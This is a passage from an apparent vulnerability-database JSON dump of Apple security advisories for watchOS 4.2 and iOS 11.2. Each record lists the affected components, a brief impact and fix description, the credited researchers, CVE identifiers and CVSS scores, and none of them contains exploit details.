Zero\n\nCVE-2017-13876: Ian Beer of Google Project Zero\n\nEntry updated December 21, 2017\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2017-7173: Brandon Azad\n\nEntry updated August 1, 2018\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to read restricted memory\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2017-13855: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2017-13865: Ian Beer of Google Project Zero\n\nCVE-2017-13868: Brandon Azad\n\nCVE-2017-13869: Jann Horn of Google Project Zero\n\nEntry updated December 21, 2017\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privilege\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13880: Apple\n\nEntry added October 18, 2018\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7165: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry updated January 22, 2017\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13884: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry updated January 22, 2017\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Visiting a malicious website may lead to user interface spoofing\n\nDescription: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. This issue was addressed through improved URL display logic.\n\nCVE-2017-7153: Jerry Decime\n\nEntry added January 11, 2018\n\n**Wi-Fi**\n\nAvailable for: Apple Watch (1st Generation) and Apple Watch Series 3 \nReleased for Apple Watch Series 1 and Apple Watch Series 2 in [watchOS 4.1](<https://support.apple.com/kb/HT208220>).\n\nImpact: An attacker in Wi-Fi range may force nonce reuse in WPA multicast/GTK clients (Key Reinstallation Attacks - KRACK)\n\nDescription: A logic issue existed in the handling of state transitions. This was addressed with improved state management.\n\nCVE-2017-13080: Mathy Vanhoef of the imec-DistriNet group at KU Leuven\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## No impact\n\nwatchOS 4.2 is not impacted by the following issue: \n\n**Kernel**\n\nImpact: An application may be able to read kernel memory (Meltdown)\n\nDescription: Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.\n\nCVE-2017-5754: Jann Horn of Google Project Zero; Moritz Lipp of Graz University of Technology; Michael Schwarz of Graz University of Technology; Daniel Gruss of Graz University of Technology; Thomas Prescher of Cyberus Technology GmbH; Werner Haas of Cyberus Technology GmbH; Stefan Mangard of Graz University of Technology; Paul Kocher; Daniel Genkin of University of Pennsylvania and University of Maryland; Yuval Yarom of University of Adelaide and Data61; and Mike Hamburg of Rambus (Cryptography Research Division)\n\nEntry added January 4, 2018, updated January 10, 2018\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: October 18, 2018\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-05T00:00:00", "type": "apple", "title": "About the security content of watchOS 4.2", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13080", "CVE-2017-13855", "CVE-2017-13861", "CVE-2017-13862", "CVE-2017-13865", "CVE-2017-13867", "CVE-2017-13868", "CVE-2017-13869", "CVE-2017-13876", "CVE-2017-13880", "CVE-2017-13884", "CVE-2017-13904", "CVE-2017-13905", "CVE-2017-5754", "CVE-2017-7151", "CVE-2017-7153", "CVE-2017-7154", "CVE-2017-7162", "CVE-2017-7165", "CVE-2017-7171", "CVE-2017-7172", "CVE-2017-7173"], "modified": "2017-12-05T00:00:00", "id": "APPLE:121C0C2C932F899F870D9D5665610ED0", "href": "https://support.apple.com/kb/HT208325", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:41:27", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## watchOS 4.2\n\nReleased December 5, 2017\n\n**Auto Unlock**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-13905: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**CFNetwork Session**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreAnimation**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7171: 360 Security working with Trend Micro's Zero Day Initiative, and Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreFoundation**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-7151: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**IOKit**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7162: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added December 21, 2017, updated January 10, 2018\n\n**IOSurface**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13861: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13904: Kevin Backhouse of Semmle Ltd.\n\nEntry added February 14, 2018\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-7154: Jann Horn of Google Project Zero\n\nEntry added January 10, 2018\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13862: Apple\n\nCVE-2017-13867: Ian Beer of Google Project Zero\n\nCVE-2017-13876: Ian Beer of Google Project Zero\n\nEntry updated December 21, 2017\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2017-7173: Brandon Azad\n\nEntry updated August 1, 2018\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to read restricted memory\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2017-13855: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2017-13865: Ian Beer of Google Project Zero\n\nCVE-2017-13868: Brandon Azad\n\nCVE-2017-13869: Jann Horn of Google Project Zero\n\nEntry updated December 21, 2017\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privilege\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13880: Apple\n\nEntry added October 18, 2018\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7165: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry updated January 22, 2017\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13884: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry updated January 22, 2017\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Visiting a malicious website may lead to user interface spoofing\n\nDescription: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. This issue was addressed through improved URL display logic.\n\nCVE-2017-7153: Jerry Decime\n\nEntry added January 11, 2018\n\n**Wi-Fi**\n\nAvailable for: Apple Watch (1st Generation) and Apple Watch Series 3 \nReleased for Apple Watch Series 1 and Apple Watch Series 2 in [watchOS 4.1](<https://support.apple.com/kb/HT208220>).\n\nImpact: An attacker in Wi-Fi range may force nonce reuse in WPA multicast/GTK clients (Key Reinstallation Attacks - KRACK)\n\nDescription: A logic issue existed in the handling of state transitions. This was addressed with improved state management.\n\nCVE-2017-13080: Mathy Vanhoef of the imec-DistriNet group at KU Leuven\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## No impact\n\nwatchOS 4.2 is not impacted by the following issue: \n\n**Kernel**\n\nImpact: An application may be able to read kernel memory (Meltdown)\n\nDescription: Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.\n\nCVE-2017-5754: Jann Horn of Google Project Zero; Moritz Lipp of Graz University of Technology; Michael Schwarz of Graz University of Technology; Daniel Gruss of Graz University of Technology; Thomas Prescher of Cyberus Technology GmbH; Werner Haas of Cyberus Technology GmbH; Stefan Mangard of Graz University of Technology; Paul Kocher; Daniel Genkin of University of Pennsylvania and University of Maryland; Yuval Yarom of University of Adelaide and Data61; and Mike Hamburg of Rambus (Cryptography Research Division)\n\nEntry added January 4, 2018, updated January 10, 2018\n", "edition": 3, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-10-18T06:10:21", "title": "About the security content of watchOS 4.2 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13869", "CVE-2017-5754", "CVE-2017-7151", "CVE-2017-13080", "CVE-2017-13865", "CVE-2017-13880", "CVE-2017-7172", "CVE-2017-7165", "CVE-2017-13904", "CVE-2017-7171", "CVE-2017-13855", "CVE-2017-7162", "CVE-2017-13876", "CVE-2017-13868", "CVE-2017-7153", "CVE-2017-13884", "CVE-2017-13867", "CVE-2017-7173", "CVE-2017-13861", "CVE-2017-7154", "CVE-2017-13905", "CVE-2017-13862"], "modified": "2018-10-18T06:10:21", "id": "APPLE:HT208325", "href": "https://support.apple.com/kb/HT208325", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-14T04:14:47", "description": "# About the security content of iOS 11.2\n\nThis document describes the security content of iOS 11.2.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## iOS 11.2\n\nReleased December 2, 2017\n\n**App Store**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An attacker in a privileged network position may be able to spoof password prompts in App Store\n\nDescription: An input validation issue was addressed through improved input validation.\n\nCVE-2017-7164: Jerry Decime\n\nEntry added January 11, 2018\n\n**Auto Unlock**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-13905: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**Calculator**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An attacker with a privileged network position may be able to alter currency conversion rates\n\nDescription: Exchange rates were retrieved from HTTP rather than HTTPS. This was addressed by enabling HTTPS for exchange rates.\n\nCVE-2017-2411: Richard Shupak (linkedin.com/in/rshupak), Seth Vargo (@sethvargo) of Google, and an anonymous researcher\n\nEntry added May 2, 2018, updated June 14, 2018\n\n**CFNetwork Session**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreAnimation**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7171: 360 Security working with Trend Micro's Zero Day Initiative, and Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreFoundation**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-7151: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**IOKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: Multiple memory corruption issues were addressed through improved state management.\n\nCVE-2017-13847: Ian Beer of Google Project Zero\n\nEntry updated January 10, 2018\n\n**IOKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7162: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added December 21, 2017, updated January 10, 2018\n\n**IOMobileFrameBuffer**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13879: Apple\n\nEntry updated October 24, 2018\n\n**IOSurface**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13861: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13904: Kevin Backhouse of Semmle Ltd.\n\nEntry added February 14, 2018\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to read kernel memory (Meltdown)\n\nDescription: Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.\n\nCVE-2017-5754: Jann Horn of Google Project Zero; Moritz Lipp of Graz University of Technology; Michael Schwarz of Graz University of Technology; Daniel Gruss of Graz University of Technology; Thomas Prescher of Cyberus Technology GmbH; Werner Haas of Cyberus Technology GmbH; Stefan Mangard of Graz University of Technology; Paul Kocher; Daniel Genkin of University of Pennsylvania and University of Maryland; Yuval Yarom of University of Adelaide and Data61; and Mike Hamburg of Rambus (Cryptography Research Division)\n\nEntry added January 4, 2018, updated January 10, 2018\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13862: Apple\n\nCVE-2017-13867: Ian Beer of Google Project Zero\n\nCVE-2017-13876: Ian Beer of Google Project Zero\n\nEntry updated December 21, 2017\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2017-7173: Brandon Azad\n\nEntry updated August 1, 2018\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to read restricted memory\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2017-13855: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to read restricted memory\n\nDescription: Multiple validation issues were addressed with improved input sanitization.\n\nCVE-2017-13865: Ian Beer of Google Project Zero\n\nCVE-2017-13868: Brandon Azad\n\nCVE-2017-13869: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-7154: Jann Horn of Google Project Zero\n\nEntry added December 21, 2017\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privilege\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13880: Apple\n\nEntry added October 18, 2018\n\n**Mail**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Incorrect certificate is used for encryption\n\nDescription: A S/MIME issue existed in the handling of encrypted email. This issue was addressed through improved selection of the encryption certificate.\n\nCVE-2017-13874: Nicolas Devillard\n\nEntry updated April 9, 2018\n\n**Mail Drafts**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An attacker with a privileged network position may be able to intercept mail\n\nDescription: An encryption issue existed with S/MIME credentials. The issue was addressed with additional checks and user control.\n\nCVE-2017-13860: Michael Weishaar of INNEO Solutions GmbH\n\n**Mail Message Framework**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed with improved state management.\n\nCVE-2017-7152: Oliver Paukstadt of Thinking Objects GmbH (to.com)\n\nEntry added December 21, 2017\n\n**ReplayKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A user may not have control over their screen broadcast\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2017-13888: Dan Niemeyer of Microsoft, Peter Pau (ArcanaArt.com)\n\nEntry added June 21, 2018, updated September 8, 2020\n\n**SafariViewController**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed through improved state management.\n\nCVE-2017-13891: Janne Raiskila (@raiskila)\n\nEntry added June 21, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13885: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7165: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13884: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Visiting a malicious website may lead to user interface spoofing\n\nDescription: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. This issue was addressed through improved URL display logic.\n\nCVE-2017-7153: Jerry Decime\n\nEntry added January 11, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7156: Yuan Deng of Ant-financial Light-Year Security Lab\n\nCVE-2017-7157: an anonymous researcher\n\nCVE-2017-13856: Jeonghoon Shin\n\nCVE-2017-13870: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-7160: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-13866: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added December 13, 2017, updated May 4, 2018\n\n**Wi-Fi**\n\nAvailable for: iPhone 6s, iPhone 6s Plus, iPhone 6, iPhone 6 Plus, iPhone SE, iPhone 5s, 12.9-inch iPad Pro 1st generation, iPad Air 2, iPad Air, iPad 5th generation, iPad mini 4, iPad mini 3, iPad mini 2, and iPod touch 6th generation \nReleased for iPhone 7 and later and iPad Pro 9.7-inch (early 2016) and later in [iOS 11.1](<https://support.apple.com/kb/HT208222>).\n\nImpact: An attacker in Wi-Fi range may force nonce reuse in WPA multicast/GTK clients (Key Reinstallation Attacks - KRACK)\n\nDescription: A logic issue existed in the handling of state transitions. This was addressed with improved state management.\n\nCVE-2017-13080: Mathy Vanhoef of the imec-DistriNet group at KU Leuven\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## Additional recognition\n\n**WebKit**\n\nWe would like to acknowledge Yi\u011fit Can YILMAZ (@yilmazcanyigit) and Abhinash Jain (@abhinashjain) researcher for their assistance.\n\nEntry added February 14, 2018, updated April 9, 2018\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: September 08, 2020\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-02T00:00:00", "type": "apple", "title": "About the security content of iOS 11.2", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13080", "CVE-2017-13847", "CVE-2017-13855", "CVE-2017-13856", "CVE-2017-13860", "CVE-2017-13861", "CVE-2017-13862", "CVE-2017-13865", "CVE-2017-13866", "CVE-2017-13867", "CVE-2017-13868", "CVE-2017-13869", "CVE-2017-13870", "CVE-2017-13874", "CVE-2017-13876", "CVE-2017-13879", "CVE-2017-13880", "CVE-2017-13884", "CVE-2017-13885", "CVE-2017-13888", "CVE-2017-13891", "CVE-2017-13904", "CVE-2017-13905", "CVE-2017-2411", "CVE-2017-5754", "CVE-2017-7151", "CVE-2017-7152", "CVE-2017-7153", "CVE-2017-7154", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160", "CVE-2017-7162", "CVE-2017-7164", "CVE-2017-7165", "CVE-2017-7171", "CVE-2017-7172", "CVE-2017-7173"], "modified": "2017-12-02T00:00:00", "id": "APPLE:3CD8680715FC8DF4A758CC6012471868", "href": "https://support.apple.com/kb/HT208334", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:41:20", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## iOS 11.2\n\nReleased December 2, 2017\n\n**App Store**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An attacker in a privileged network position may be able to spoof password prompts in App Store\n\nDescription: An input validation issue was addressed through improved input validation.\n\nCVE-2017-7164: Jerry Decime\n\nEntry added January 11, 2018\n\n**Auto Unlock**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-13905: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**Calculator**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An attacker with a privileged network position may be able to alter currency conversion rates\n\nDescription: Exchange rates were retrieved from HTTP rather than HTTPS. This was addressed by enabling HTTPS for exchange rates.\n\nCVE-2017-2411: Richard Shupak (linkedin.com/in/rshupak), Seth Vargo (@sethvargo) of Google, and an anonymous researcher\n\nEntry added May 2, 2018, updated June 14, 2018\n\n**CFNetwork Session**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend 